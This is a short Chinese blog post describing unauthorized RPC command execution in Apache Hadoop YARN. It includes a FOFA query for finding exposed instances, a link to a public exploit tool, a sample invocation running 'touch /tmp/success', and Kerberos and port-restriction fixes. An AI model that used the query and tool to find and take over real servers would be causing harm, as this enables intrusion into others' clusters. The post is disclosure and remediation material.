Hadoop Yarn RPC未授权访问漏洞

举报
新网工李白 发表于 2021/11/25 16:03:24 2021/11/25
【摘要】 Hadoop Yarn RPC未授权访问漏洞

在这里插入图片描述

💬 漏洞详情

Apache Hadoop YARN (Yet Another Resource Negotiator)是一种新的 Hadoop 资源管理器,它是一个通用资源管理系统,可为上层应用提供统一的资源管理和调度,它的引入为集群在利用率、资源统一管理和数据共享等方面带来了巨大好处。

Hadoop Yarn默认对外开放RPC服务,攻击者可利用RPC服务执行任意命令,进而控制服务器。同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST API不一样,因此即使在 REST API有授权认证的情况下,RPC服务所在端口仍然可以未授权访问。

💢影响版本

  • 全版本

📢 复现环境

Vulfous

👀FOFA语法

app="APACHE-hadoop-YARN"

🐓漏洞利用

在此感谢师傅的利用工具tql💪

https://github.com/cckuailong/YarnRpcRCE

在这里插入图片描述

在这里插入图片描述
工具使用

java -jar YarnRpcUnauth.jar ip:port "touch /tmp/success"

在这里插入图片描述
在这里插入图片描述

🔑漏洞修复

(临时修复建议)

  1. Apache Hadoop官方建议用户开启Kerberos认证。
  2. 设置 Hadoop RPC服务所在端口仅对可信地址开放。
  3. 建议升级并启用Kerberos的认证功能,阻止未经授权的访问。
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。